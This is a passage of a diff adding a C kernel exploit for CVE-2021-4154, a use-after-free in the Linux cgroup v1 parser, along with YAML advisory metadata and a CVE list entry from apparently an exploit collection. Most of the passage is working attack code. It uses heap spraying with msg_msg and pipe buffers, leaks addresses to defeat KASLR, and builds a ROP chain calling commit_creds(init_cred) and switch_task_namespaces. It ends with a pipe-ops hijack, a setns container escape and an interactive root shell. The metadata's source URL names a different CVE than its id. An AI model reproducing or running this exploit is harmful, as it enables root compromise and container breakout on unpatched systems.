for (int i=0; i<MAX_PIPE_NUM; i++) {
// 8*40 = 320 > 256
fcntl(pipes[i][1], F_SETPIPE_SZ, 0x8000);
}
// init pipe_buffer
for (int i=0; i<MAX_PIPE_NUM; i++) {
write(pipes[i][1], "KCTF", 4);
}
// step 7, now, let's leak ops
memset(leak, 0, 0x2000);
unsigned long *pipe_buffer = 0;
unsigned long pipe_ops = 0;
unsigned long pipe_page = 0;
msg_recv(msg_ids[msg_id], 0, leak, 0x1400-48-8);
pipe_ops = *(unsigned long int*)(leak+0x10+leak_offset);
pipe_page = *(unsigned long int*)(leak+leak_offset);
DumpHex(leak+leak_offset, 0x20);
kaslr_offset = pipe_ops - 0xffffffff81e3ce40;
printf("kaslr offset : %lx\n", kaslr_offset);
printf("found pipe ops at: 0x%lx\n", pipe_ops);
printf("found page at: 0x%lx\n", pipe_page);
msg_free(msg_ids[msg_id+1], 1, leak, 0x1200-48-8);
unsigned long int heap = 0;
unsigned long int heap_rand = 0;
int pipe_victim_idx = -1;
for (int j=0; j<MAX_PIPE_NUM; j++) {
// free buffer
// printf("%d\n", j);
fcntl(pipes[j][1], F_SETPIPE_SZ, 0xa000);
memset(leak, 0, 0x1200);
msg_recv(msg_ids[msg_id], 0, leak, 0x1400-48-8);
heap_rand = *(unsigned long int*)(leak+leak_offset);
if (heap_rand && heap_rand != pipe_page) {
printf("heap rand: %lx\n", heap_rand);
heap = heap_rand ^ slab_rand;
printf("found heap addr : 0x%lx\n", heap);
break;
}
pipe_victim_idx = j;
}
assert(heap);
printf("leak done\n");
// getchar();
// spray msg a little bit to put payload there
memset(m->data, 0, 0x1800);
for (int j=MAX_PIPE_NUM; j<MAX_PIPE_NUM*2; j++) {
// printf("%d\n", j);
pipe_victim_idx = j;
int stop = 0;
fcntl(pipes[j][1], F_SETPIPE_SZ, 0x8000);
memset(leak, 0, 0x1400);
msg_recv(msg_ids[msg_id], 0, leak, 0x1400-48-8);
for (int i=0; i<0x1200-48-8-0x10; i+=8) {
if (*(unsigned long int*)(leak+0x10+i) != 0x4141414141414141) {
if (heap_rand != *(unsigned long int*)(leak+0x10+i)) {
printf("stop spraying\n");
stop = 1;
}
// DumpHex(leak+i, 0x30);
break;
}
}
if (stop) break;
}
write(pipes[pipe_victim_idx][1], "KCTF", 4);
printf("pipe on again\n");
// getchar();
int pid = getpid();
// now we spray memory on known heap
// llseek --> arb read
// read --> arb write
// ops which is rdx
memset(m->data, 0, 0x1800);
unsigned long int *ops = (unsigned long int*)(m->data+0x1000-48);
*ops++ = 0xffffffff811004c3 + kaslr_offset; // : push rsi ; jmp qword ptr [rsi + 0x2e]
*ops++ = 0xffffffff811004c3 + kaslr_offset; // : push rsi ; jmp qword ptr [rsi + 0x2e]
*ops++ = 0xffffffff811004c3 + kaslr_offset; // : push rsi ; jmp qword ptr [rsi + 0x2e]
// 0xffffffff81c03275 : push rsi ; jmp qword ptr [rsi + 0x56]
// start rop here
// *(unsigned long int*)(m->data+0x1000-48+0x46) = 0xffffffff81218967; // pop rsp ; add eax, 0x83480000 ; ret
// *(unsigned long int*)(m->data+0x1000-48-8+0x46) = 0xffffffff81218967; // pop rsp ; add eax, 0x83480000 ; ret
unsigned long int *rop = (unsigned long int*)(m->data+0x1000-48-8+0x20);
*rop++ = 0xffffffff816fa405 + kaslr_offset; // enter 0,0; push rbp; mov ebp, esp;
*rop++ = heap+0x180; // r14, store rbp
*rop++ = 0xdeadbeef; // rbp
// move rbp to heap;
*rop++ = 0xffffffff81503f78 + kaslr_offset; // mov qword ptr [r14], rbx ; pop rbx ; pop r14 ; pop rbp ; ret
*rop++ = 0xdeadbeef;
*rop++ = 0xdeadbeef;
*rop++ = 0xdeadbeef;
// commit_creds(init_cred)
*rop++ = 0xffffffff81067a60 + kaslr_offset; // pop rdi
// *rop++ = 0;
// *rop++ = 0xffffffff8109f330 + kaslr_offset; // prepare kernel cred
// *rop++ = 0xffffffff8108d212 + kaslr_offset; // pop rdx
// *rop++ = 1;
// *rop++ = 0xffffffff8154e861 + kaslr_offset; // cmp rdx, 1 ; jne 0xffffffff8154e89d ; pop rbp ; ret
// *rop++ = 0xdeadbeef; // rbp
// *rop++ = 0xffffffff8123cb26 + kaslr_offset; // mov rdi, rax ; jne 0xffffffff8123cb16 ; pop rbp ; ret
// *rop++ = 0xdeadbeef; // rbp
*rop++ = 0xffffffff82250950 + kaslr_offset; // init_cred
*rop++ = 0xffffffff8109ed70 + kaslr_offset; // commit_creds
// 0xffffffff82219700 init_task
// 0xffffffff82250580 init_ns
// switch context
*rop++ = 0xffffffff81067a60 + kaslr_offset;
*rop++ = 1;
*rop++ = 0xffffffff810963e0 + kaslr_offset; // find_task_by_vpid
*rop++ = 0xffffffff8108d212 + kaslr_offset; // pop rdx
*rop++ = 1;
*rop++ = 0xffffffff8154e861 + kaslr_offset; // cmp rdx, 1 ; jne 0xffffffff8154e89d ; pop rbp ; ret
*rop++ = 0xdeadbeef; // rbp
*rop++ = 0xffffffff8123cb26 + kaslr_offset; // mov rdi, rax ; jne 0xffffffff8123cb16 ; pop rbp ; ret
*rop++ = 0xdeadbeef; // rbp
*rop++ = 0xffffffff8105d30f + kaslr_offset; // pop rsi ; ret
*rop++ = 0xffffffff82250580 + kaslr_offset; // init_nsproxy
*rop++ = 0xffffffff8109d1a0 + kaslr_offset; // switch_task_namespaces
// return execution
*rop++ = 0xffffffff81000571 + kaslr_offset; // pop rbp
*rop++ = heap+0x180+0x10;
*rop++ = 0xffffffff8123e2cd + kaslr_offset; // : push qword ptr [rbp - 0x10] ; pop rbp ; ret
*rop++ = 0xffffffff810679cc + kaslr_offset; // : mov rsp, rbp ; pop rbp ; ret
// spray ops
for (int i=MAX_MSG_SPRAY; i<MAX_MSG_SPRAY+100; i++) {
if (msgsnd(msg_ids[i], (void *)m, 0x1000+0x200-48-8, 0) != 0) {
err(1, "msgsnd");
}
}
// ffffffff81298fd0 free_pipe_info
// 0xffffffff81299049 call r11
// arb read
// 0xffffffff8104f385 : mov rax, qword ptr [rsi + 0x18] ; ret
// cos
// 0xffffffff810239b1 : mov eax, dword ptr [rsi - 0x38b7fffb] ; ret
// arb write
// 0xffffffff8116005b : mov qword ptr [rsi], rdx ; ret
// 0xffffffff81ab62f8 : mov dword ptr [rdx], esi ; ret
// *payload++ =
// ops == known_heap
// rdx is the ops == 0
// rax == pipe_buffer+0x10 == 0
// rcx == rsi == the pipe_buffer { page, 8 byte, ops}
// 0xffffffff8108b6b7 : jmp qword ptr [rdx]
// 0xffffffff826c61b7 : jmp qword ptr [rdx + 0x23]
// 0xffffffff81feff8e : push rcx ; jmp qword ptr [rdx + 0x46]
// 0xffffffff811004c3 : push rsi ; jmp qword ptr [rsi + 0x2e]
// 0xffffffff81218967 : pop rsp ; add eax, 0x83480000 ; ret
// 0xffffffff816fa405 : enter 0, 0 ; pop rbx ; pop r14 ; pop rbp ; ret
// 0xffffffff81503f78 : mov qword ptr [r14], rbx ; pop rbx ; pop r14 ; pop rbp ; ret
// 0xffffffff81067a60 : pop rdi ; ret
// 0xffffffff8108d212 : pop rdx ; ret
// 0xffffffff81000571 : pop rbp ; ret
// 0xffffffff8123e2cd : push qword ptr [rbp - 0x10] ; pop rbp ; ret
// 0xffffffff810679cc : mov rsp, rbp ; pop rbp ; ret
// 0xffffffff8154e861 : cmp rdx, 1 ; jne 0xffffffff8154e89d ; pop rbp ; ret
// 0xffffffff810566ac : pop rcx ; ret
// 0xffffffff8123cb26 : mov rdi, rax ; jne 0xffffffff8123cb16 ; pop rbp ; ret
// 0xffffffff8105d30f : pop rsi ; ret
// hijack ops
msg_free(msg_ids[msg_id], 1, leak, 0x1200-48-8);
// make f_count == 0 to prevent a crash.
memset(m->data, 0, 0x1800);
unsigned long int *payload = (unsigned long int *)(m->data+0x1000-48);
*(unsigned long int*)(m->data + leak_offset-8) = 0xffffffff810c7fbe + kaslr_offset; // : pop rsp ; ret; // rsp // page
*(unsigned long int*)(m->data + leak_offset) = heap+0x20; // offset
*(unsigned long int*)(m->data + leak_offset+8) = heap; // ops
*(unsigned long int*)(m->data + leak_offset-8+0x28) = heap+0x100; // ops
*(unsigned long int*)(m->data + leak_offset-8+0x2e) = 0xffffffff81218967 + kaslr_offset; // pop rsp ; add eax, 0x83480000 ; ret
for (int i=MAX_MSG_SPRAY+100; i<MAX_MSG_SPRAY+200; i++) {
if (msgsnd(msg_ids[i], (void *)m, 0x1000+0x200-48-8, 0) != 0) {
err(1, "msgsnd");
}
}
printf("done, hijacking\n");
// getchar();
close(pipes[pipe_victim_idx][1]);
close(pipes[pipe_victim_idx][0]);
if (setns(open("/proc/1/ns/mnt", O_RDONLY), 0) < 0) {
perror("setns 1");
}
if (setns(open("/proc/1/ns/pid", O_RDONLY), 0) < 0) {
perror("setns 2");
setns(open("/proc/1/ns/pid", O_RDONLY), 0);
}
char *args[] = {"/bin/bash", "-i", NULL};
execve(args[0], args, NULL);
printf("exit...\n");
getchar();
}
int main(void) {
use_temporary_dir();
do_exp();
}


@ -0,0 +1,20 @@
id: CVE-2021-4154
source: https://github.com/delsploit/CVE-2022-2078
info:
  name: The Linux kernel is the kernel of the open-source Linux operating system, maintained by the Linux Foundation.
severity: high
description: |
A use-after-free flaw was found in cgroup1_parse_param in kernel/cgroup/cgroup-v1.c in the Linux kernel's cgroup v1 parser. A local attacker with a user privilege could cause a privilege escalation by exploiting the fsconfig syscall parameter leading to a container breakout and a denial of service on the system.
scope-of-influence:
Linux Kernel versions prior to 5.14 rc2
reference:
- https://bugzilla.redhat.com/show_bug.cgi?id=2034514
- https://cloud.google.com/anthos/clusters/docs/security-bulletins#gcp-2022-002
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id...
- https://security.netapp.com/advisory/ntap-20220225-0004/
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2021-4154
cwe-id: 416
  tags: cve2021,use-after-free


@ -13,6 +13,7 @@ cve:
linux-kernel:
- CVE-2021-4204
- CVE-2021-22555
- CVE-2021-4154
- CVE-2022-34918
- CVE-2022-2639
- CVE-2022-0847